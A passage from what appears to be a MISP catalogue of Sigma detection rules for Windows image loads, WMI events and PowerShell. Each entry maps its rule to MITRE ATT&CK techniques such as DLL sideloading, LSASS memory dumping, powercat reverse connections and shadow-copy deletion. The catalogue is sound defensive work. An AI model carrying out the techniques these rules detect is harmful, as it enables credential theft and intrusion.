  • related-to: misp-galaxy:mitre-attack-pattern="Process Injection - T1055" with estimative-language:likelihood-probability="almost-certain"

Table 9567. Table References

Links

https://web.archive.org/web/20221026202428/https://gist.github.com/code-scrap/d7f152ffcdb3e0b02f7f394f5187f008

https://github.com/tyranid/DotNetToJScript

https://blog.menasec.net/2019/07/interesting-difr-traces-of-net-clr.html

https://thewover.github.io/Introducing-Donut/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_script_dotnet_clr_dll_load.yml

VMMap Unsigned Dbghelp.DLL Potential Sideloading

Detects potential DLL sideloading of an unsigned dbghelp.dll by the Sysinternals VMMap.

The tag is: misp-galaxy:sigma-rules="VMMap Unsigned Dbghelp.DLL Potential Sideloading"

VMMap Unsigned Dbghelp.DLL Potential Sideloading has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1574.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"

Table 9568. Table References

Links

https://techcommunity.microsoft.com/t5/sysinternals-blog/zoomit-v7-1-procdump-2-0-for-linux-process-explorer-v17-05/ba-p/3884766

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_vmmap_dbghelp_unsigned.yml

Potential CCleanerReactivator.DLL Sideloading

Detects potential DLL sideloading of "CCleanerReactivator.dll"

The tag is: misp-galaxy:sigma-rules="Potential CCleanerReactivator.DLL Sideloading"

Potential CCleanerReactivator.DLL Sideloading has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1574.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"

Table 9569. Table References

Links

https://lab52.io/blog/2344-2/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_ccleaner_reactivator.yml

Load Of Dbghelp/Dbgcore DLL From Suspicious Process

Detects the load of dbghelp/dbgcore DLL (used to make memory dumps) by suspicious processes. Tools like ProcessHacker and some attacker tradecraft use MiniDumpWriteDump API found in dbghelp.dll or dbgcore.dll. As an example, SilentTrynity C2 Framework has a module that leverages this API to dump the contents of Lsass.exe and transfer it over the network back to the attacker’s machine.

The tag is: misp-galaxy:sigma-rules="Load Of Dbghelp/Dbgcore DLL From Suspicious Process"

Load Of Dbghelp/Dbgcore DLL From Suspicious Process has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

Table 9570. Table References

Links

https://www.pinvoke.net/default.aspx/dbghelp/MiniDumpWriteDump.html

https://medium.com/@fsx30/bypass-edrs-memory-protection-introduction-to-hooking-2efb21acffd6

https://docs.microsoft.com/en-us/windows/win32/api/minidumpapiset/nf-minidumpapiset-minidumpwritedump

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_dll_dbghelp_dbgcore_susp_load.yml

Potential WWlib.DLL Sideloading

Detects potential DLL sideloading of "wwlib.dll"

The tag is: misp-galaxy:sigma-rules="Potential WWlib.DLL Sideloading"

Potential WWlib.DLL Sideloading has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1574.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"

Table 9571. Table References

Links

https://twitter.com/WhichbufferArda/status/1658829954182774784

https://news.sophos.com/en-us/2022/11/03/family-tree-dll-sideloading-cases-may-be-related/

https://securelist.com/apt-luminousmoth/103332/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_wwlib.yml

PCRE.NET Package Image Load

Detects processes loading modules related to PCRE.NET package

The tag is: misp-galaxy:sigma-rules="PCRE.NET Package Image Load"

PCRE.NET Package Image Load has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

Table 9572. Table References

Links

https://twitter.com/rbmaslen/status/1321859647091970051

https://twitter.com/tifkin_/status/1321916444557365248

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_dll_pcre_dotnet_dll_load.yml

Time Travel Debugging Utility Usage - Image

Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.

The tag is: misp-galaxy:sigma-rules="Time Travel Debugging Utility Usage - Image"

Time Travel Debugging Utility Usage - Image has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

Table 9573. Table References

Links

https://twitter.com/oulusoyum/status/1191329746069655553

https://lolbas-project.github.io/lolbas/Binaries/Tttracer/

https://twitter.com/mattifestation/status/1196390321783025666

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_dll_tttracer_module_load.yml

Potential DLL Sideloading Via ClassicExplorer32.dll

Detects potential DLL sideloading using ClassicExplorer32.dll from the Classic Shell software

The tag is: misp-galaxy:sigma-rules="Potential DLL Sideloading Via ClassicExplorer32.dll"

Potential DLL Sideloading Via ClassicExplorer32.dll has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1574.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"

Table 9574. Table References

Links

https://app.any.run/tasks/6d8cabb0-dcda-44b6-8050-28d6ce281687/

https://blogs.blackberry.com/en/2022/12/mustang-panda-uses-the-russian-ukrainian-war-to-attack-europe-and-asia-pacific-targets

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_classicexplorer32.yml

Potential DLL Sideloading Of DBGHELP.DLL

Detects DLL sideloading of "dbghelp.dll"

The tag is: misp-galaxy:sigma-rules="Potential DLL Sideloading Of DBGHELP.DLL"

Potential DLL Sideloading Of DBGHELP.DLL has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1574.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"

Table 9575. Table References

Links

https://hijacklibs.net/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_dbghelp_dll.yml

Potential RoboForm.DLL Sideloading

Detects potential DLL sideloading of "roboform.dll", a DLL used by RoboForm Password Manager

The tag is: misp-galaxy:sigma-rules="Potential RoboForm.DLL Sideloading"

Potential RoboForm.DLL Sideloading has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1574.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"

Table 9576. Table References

Links

https://twitter.com/StopMalvertisin/status/1648604148848549888

https://twitter.com/t3ft3lb/status/1656194831830401024

https://www.roboform.com/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_robform.yml

HackTool - SILENTTRINITY Stager DLL Load

Detects SILENTTRINITY stager dll loading activity

The tag is: misp-galaxy:sigma-rules="HackTool - SILENTTRINITY Stager DLL Load"

HackTool - SILENTTRINITY Stager DLL Load has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Application Layer Protocol - T1071" with estimative-language:likelihood-probability="almost-certain"

Table 9577. Table References

Links

https://github.com/byt3bl33d3r/SILENTTRINITY

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_hktl_silenttrinity_stager.yml

Potential Mpclient.DLL Sideloading

Detects potential sideloading of "mpclient.dll" by Windows Defender processes ("MpCmdRun" and "NisSrv") from their non-default directory.

The tag is: misp-galaxy:sigma-rules="Potential Mpclient.DLL Sideloading"

Potential Mpclient.DLL Sideloading has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"

Table 9578. Table References

Links

https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_windows_defender.yml

DLL Loaded From Suspicious Location Via Cmspt.EXE

Detects cmstp loading "dll" or "ocx" files from suspicious locations

The tag is: misp-galaxy:sigma-rules="DLL Loaded From Suspicious Location Via Cmspt.EXE"

DLL Loaded From Suspicious Location Via Cmspt.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="CMSTP - T1218.003" with estimative-language:likelihood-probability="almost-certain"

Table 9579. Table References

Links

https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/TTPs/Defense%20Evasion/T1218%20-%20Signed%20Binary%20Proxy%20Execution/T1218.003%20-%20CMSTP/Procedures.yaml

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_cmstp_load_dll_from_susp_location.yml

Potential Libvlc.DLL Sideloading

Detects potential DLL sideloading of "libvlc.dll", a DLL that is legitimately used by "VLC.exe"

The tag is: misp-galaxy:sigma-rules="Potential Libvlc.DLL Sideloading"

Potential Libvlc.DLL Sideloading has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1574.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"

Table 9580. Table References

Links

https://hijacklibs.net/entries/3rd_party/vlc/libvlc.html

https://www.trendmicro.com/en_us/research/23/c/earth-preta-updated-stealthy-strategies.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_libvlc.yml

Active Directory Parsing DLL Loaded Via Office Application

Detects DSParse DLL being loaded by an Office Product

The tag is: misp-galaxy:sigma-rules="Active Directory Parsing DLL Loaded Via Office Application"

Active Directory Parsing DLL Loaded Via Office Application has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"

Table 9581. Table References

Links

https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_office_dsparse_dll_load.yml

PowerShell Core DLL Loaded Via Office Application

Detects PowerShell core DLL being loaded by an Office Product

The tag is: misp-galaxy:sigma-rules="PowerShell Core DLL Loaded Via Office Application"

Table 9582. Table References

Links

Internal Research[Internal Research]

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_office_powershell_dll_load.yml

Potential SmadHook.DLL Sideloading

Detects potential DLL sideloading of "SmadHook.dll", a DLL used by SmadAV antivirus

The tag is: misp-galaxy:sigma-rules="Potential SmadHook.DLL Sideloading"

Potential SmadHook.DLL Sideloading has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1574.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"

Table 9583. Table References

Links

https://research.checkpoint.com/2023/malware-spotlight-camaro-dragons-tinynote-backdoor/

https://www.qurium.org/alerts/targeted-malware-against-crph/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_smadhook.yml

DLL Load By System Process From Suspicious Locations

Detects when a system process (i.e. located in system32, syswow64, etc.) loads a DLL from a suspicious location or a location with permissive permissions such as "C:\Users\Public"

The tag is: misp-galaxy:sigma-rules="DLL Load By System Process From Suspicious Locations"

DLL Load By System Process From Suspicious Locations has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Indicator Removal - T1070" with estimative-language:likelihood-probability="almost-certain"

Table 9584. Table References

Links

https://github.com/hackerhouse-opensource/iscsicpl_bypassUAC (Idea)[https://github.com/hackerhouse-opensource/iscsicpl_bypassUAC (Idea)]

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_dll_load_system_process.yml

Potential Edputil.DLL Sideloading

Detects potential DLL sideloading of "edputil.dll"

The tag is: misp-galaxy:sigma-rules="Potential Edputil.DLL Sideloading"

Potential Edputil.DLL Sideloading has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1574.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"

Table 9585. Table References

Links

https://alternativeto.net/news/2023/5/cybercriminals-use-wordpad-vulnerability-to-spread-qbot-malware/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_edputil.yml

GAC DLL Loaded Via Office Applications

Detects any GAC DLL being loaded by an Office Product

The tag is: misp-galaxy:sigma-rules="GAC DLL Loaded Via Office Applications"

GAC DLL Loaded Via Office Applications has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"

Table 9586. Table References

Links

https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_office_dotnet_gac_dll_load.yml

DLL Sideloading Of ShellChromeAPI.DLL

Detects processes loading the non-existent DLL "ShellChromeAPI". One known example is the "DeviceEnroller" binary in combination with the "PhoneDeepLink" flag tries to load this DLL. Adversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe using this parameter

The tag is: misp-galaxy:sigma-rules="DLL Sideloading Of ShellChromeAPI.DLL"

DLL Sideloading Of ShellChromeAPI.DLL has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1574.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"

Table 9587. Table References

Links

https://mobile.twitter.com/0gtweet/status/1564131230941122561

https://strontic.github.io/xcyclopedia/library/DeviceEnroller.exe-24BEF0D6B0ECED36BB41831759FDE18D.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_shell_chrome_api.yml

Potential Iviewers.DLL Sideloading

Detects potential DLL sideloading of "iviewers.dll" (OLE/COM Object Interface Viewer)

The tag is: misp-galaxy:sigma-rules="Potential Iviewers.DLL Sideloading"

Potential Iviewers.DLL Sideloading has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1574.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"

Table 9588. Table References

Links

https://www.secureworks.com/research/shadowpad-malware-analysis

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_iviewers.yml

Suspicious Volume Shadow Copy Vsstrace.dll Load

Detects the image load of VSS DLL by uncommon executables

The tag is: misp-galaxy:sigma-rules="Suspicious Volume Shadow Copy Vsstrace.dll Load"

Suspicious Volume Shadow Copy Vsstrace.dll Load has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Inhibit System Recovery - T1490" with estimative-language:likelihood-probability="almost-certain"

Table 9589. Table References

Links

https://github.com/ORCx41/DeleteShadowCopies

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_dll_vsstrace_susp_load.yml

Active Directory Kerberos DLL Loaded Via Office Application

Detects Kerberos DLL being loaded by an Office Product

The tag is: misp-galaxy:sigma-rules="Active Directory Kerberos DLL Loaded Via Office Application"

Active Directory Kerberos DLL Loaded Via Office Application has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"

Table 9590. Table References

Links

https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_office_kerberos_dll_load.yml

Wmiprvse Wbemcomn DLL Hijack

Detects a threat actor creating a file named wbemcomn.dll in the C:\Windows\System32\wbem\ directory over the network and loading it for a WMI DLL Hijack scenario.

The tag is: misp-galaxy:sigma-rules="Wmiprvse Wbemcomn DLL Hijack"

Wmiprvse Wbemcomn DLL Hijack has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="SMB/Windows Admin Shares - T1021.002" with estimative-language:likelihood-probability="almost-certain"

Table 9591. Table References

Links

https://threathunterplaybook.com/hunts/windows/201009-RemoteWMIWbemcomnDLLHijack/notebook.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_wmiprvse_wbemcomn_dll_hijack.yml

Microsoft VBA For Outlook Addin Loaded Via Outlook

Detects outlvba (Microsoft VBA for Outlook Addin) DLL being loaded by the outlook process

The tag is: misp-galaxy:sigma-rules="Microsoft VBA For Outlook Addin Loaded Via Outlook"

Microsoft VBA For Outlook Addin Loaded Via Outlook has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"

Table 9592. Table References

Links

https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=58

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_office_outlook_outlvba_load.yml

Windows Spooler Service Suspicious Binary Load

Detect DLL Load from Spooler Service backup folder

The tag is: misp-galaxy:sigma-rules="Windows Spooler Service Suspicious Binary Load"

Windows Spooler Service Suspicious Binary Load has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Hijack Execution Flow - T1574" with estimative-language:likelihood-probability="almost-certain"

Table 9593. Table References

Links

https://github.com/hhlxf/PrintNightmare

https://github.com/ly4k/SpoolFool

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_spoolsv_dll_load.yml

Microsoft Office DLL Sideload

Detects DLL sideloading of DLLs that are part of Microsoft Office from non standard location

The tag is: misp-galaxy:sigma-rules="Microsoft Office DLL Sideload"

Microsoft Office DLL Sideload has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1574.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"

Table 9594. Table References

Links

https://hijacklibs.net/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_office_dlls.yml

Potential DLL Sideloading Of Libcurl.DLL Via GUP.EXE

Detects potential DLL sideloading of "libcurl.dll" by the "gup.exe" process from an uncommon location

The tag is: misp-galaxy:sigma-rules="Potential DLL Sideloading Of Libcurl.DLL Via GUP.EXE"

Potential DLL Sideloading Of Libcurl.DLL Via GUP.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1574.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"

Table 9595. Table References

Links

https://labs.withsecure.com/publications/fin7-target-veeam-servers

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_gup_libcurl.yml

VBA DLL Loaded Via Office Application

Detects VB DLL’s loaded by an office application. Which could indicate the presence of VBA Macros.

The tag is: misp-galaxy:sigma-rules="VBA DLL Loaded Via Office Application"

VBA DLL Loaded Via Office Application has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"

Table 9596. Table References

Links

https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_office_vbadll_load.yml

Potential Chrome Frame Helper DLL Sideloading

Detects potential DLL sideloading of "chrome_frame_helper.dll"

The tag is: misp-galaxy:sigma-rules="Potential Chrome Frame Helper DLL Sideloading"

Potential Chrome Frame Helper DLL Sideloading has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1574.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"

Table 9597. Table References

Links

https://hijacklibs.net/entries/3rd_party/google/chrome_frame_helper.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_chrome_frame_helper.yml

CLR DLL Loaded Via Office Applications

Detects CLR DLL being loaded by an Office Product

The tag is: misp-galaxy:sigma-rules="CLR DLL Loaded Via Office Applications"

CLR DLL Loaded Via Office Applications has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"

Table 9598. Table References

Links

https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_office_dotnet_clr_dll_load.yml

CredUI.DLL Loaded By Uncommon Process

Detects loading of "credui.dll" and related DLLs by an uncommon process. Attackers might leverage this DLL for potential use of "CredUIPromptForCredentials" or "CredUnPackAuthenticationBufferW".

The tag is: misp-galaxy:sigma-rules="CredUI.DLL Loaded By Uncommon Process"

CredUI.DLL Loaded By Uncommon Process has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="GUI Input Capture - T1056.002" with estimative-language:likelihood-probability="almost-certain"

Table 9599. Table References

Links

https://docs.microsoft.com/en-us/windows/win32/api/wincred/nf-wincred-creduipromptforcredentialsa

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.002/T1056.002.md#atomic-test-2---powershell---prompt-user-for-password

https://github.com/S12cybersecurity/RDPCredentialStealer

https://securitydatasets.com/notebooks/atomic/windows/credential_access/SDWIN-201020013208.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_dll_credui_uncommon_process_load.yml

Suspicious Encoded Scripts in a WMI Consumer

Detects suspicious encoded payloads in WMI Event Consumers

The tag is: misp-galaxy:sigma-rules="Suspicious Encoded Scripts in a WMI Consumer"

Suspicious Encoded Scripts in a WMI Consumer has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation Event Subscription - T1546.003" with estimative-language:likelihood-probability="almost-certain"

Table 9600. Table References

Links

https://github.com/RiccardoAncarani/LiquidSnake

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/wmi_event/sysmon_wmi_susp_encoded_scripts.yml

WMI Event Subscription

Detects creation of WMI event subscription persistence method

The tag is: misp-galaxy:sigma-rules="WMI Event Subscription"

WMI Event Subscription has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation Event Subscription - T1546.003" with estimative-language:likelihood-probability="almost-certain"

Table 9601. Table References

Links

https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon#event-id-20-wmievent-wmieventconsumer-activity-detected

https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon#event-id-19-wmievent-wmieventfilter-activity-detected

https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon#event-id-21-wmievent-wmieventconsumertofilter-activity-detected

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/wmi_event/sysmon_wmi_event_subscription.yml

Suspicious Scripting in a WMI Consumer

Detects suspicious commands that are related to scripting/powershell in WMI Event Consumers

The tag is: misp-galaxy:sigma-rules="Suspicious Scripting in a WMI Consumer"

Suspicious Scripting in a WMI Consumer has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"

Table 9602. Table References

Links

https://in.security/an-intro-into-abusing-and-identifying-wmi-event-subscriptions-for-persistence/

https://github.com/RiccardoAncarani/LiquidSnake

https://github.com/Neo23x0/signature-base/blob/615bf1f6bac3c1bdc417025c40c073e6c2771a76/yara/gen_susp_lnk_files.yar#L19

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/wmi_event/sysmon_wmi_susp_scripting.yml

Netcat The Powershell Version

Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network

The tag is: misp-galaxy:sigma-rules="Netcat The Powershell Version"

Netcat The Powershell Version has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Non-Application Layer Protocol - T1095" with estimative-language:likelihood-probability="almost-certain"

Table 9603. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1095/T1095.md

https://github.com/besimorhino/powercat

https://nmap.org/ncat/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_powercat.yml

Suspicious Non PowerShell WSMAN COM Provider

Detects suspicious use of the WSMAN provider without PowerShell.exe as the host application.

The tag is: misp-galaxy:sigma-rules="Suspicious Non PowerShell WSMAN COM Provider"

Suspicious Non PowerShell WSMAN COM Provider has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Distributed Component Object Model - T1021.003" with estimative-language:likelihood-probability="almost-certain"

Table 9604. Table References

Links

https://bohops.com/2020/05/12/ws-management-com-another-approach-for-winrm-lateral-movement/

https://github.com/bohops/WSMan-WinRM

https://twitter.com/chadtilbury/status/1275851297770610688

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_wsman_com_provider_no_powershell.yml

Use Get-NetTCPConnection

Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.

The tag is: misp-galaxy:sigma-rules="Use Get-NetTCPConnection"

Use Get-NetTCPConnection has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Network Connections Discovery - T1049" with estimative-language:likelihood-probability="almost-certain"

Table 9605. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md#atomic-test-2---system-network-connections-discovery-with-powershell

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_susp_get_nettcpconnection.yml

Remote PowerShell Session (PS Classic)

Detects remote PowerShell sessions

The tag is: misp-galaxy:sigma-rules="Remote PowerShell Session (PS Classic)"

Remote PowerShell Session (PS Classic) has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Remote Management - T1021.006" with estimative-language:likelihood-probability="almost-certain"

Table 9606. Table References

Links

https://threathunterplaybook.com/hunts/windows/190511-RemotePwshExecution/notebook.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_remote_powershell_session.yml

PowerShell Called from an Executable Version Mismatch

Detects PowerShell called from an executable by the version mismatch method

The tag is: misp-galaxy:sigma-rules="PowerShell Called from an Executable Version Mismatch"

PowerShell Called from an Executable Version Mismatch has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9607. Table References

Links

https://adsecurity.org/?p=2921

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_exe_calling_ps.yml

PowerShell Downgrade Attack - PowerShell

Detects PowerShell downgrade attack by comparing the host versions with the actually used engine version 2.0

The tag is: misp-galaxy:sigma-rules="PowerShell Downgrade Attack - PowerShell"

PowerShell Downgrade Attack - PowerShell has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9608. Table References

Links

http://www.leeholmes.com/blog/2017/03/17/detecting-and-preventing-powershell-downgrade-attacks/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_downgrade_attack.yml

Delete Volume Shadow Copies Via WMI With PowerShell

Shadow Copies deletion using operating systems utilities via PowerShell

The tag is: misp-galaxy:sigma-rules="Delete Volume Shadow Copies Via WMI With PowerShell"

Delete Volume Shadow Copies Via WMI With PowerShell has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Inhibit System Recovery - T1490" with estimative-language:likelihood-probability="almost-certain"

Table 9609. Table References

Links

https://www.fortinet.com/blog/threat-research/stomping-shadow-copies-a-second-look-into-deletion-methods

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_delete_volume_shadow_copies.yml

Suspicious XOR Encoded PowerShell Command Line - PowerShell

Detects suspicious powershell process which includes bxor command, alternative obfuscation method to b64 encoded commands.

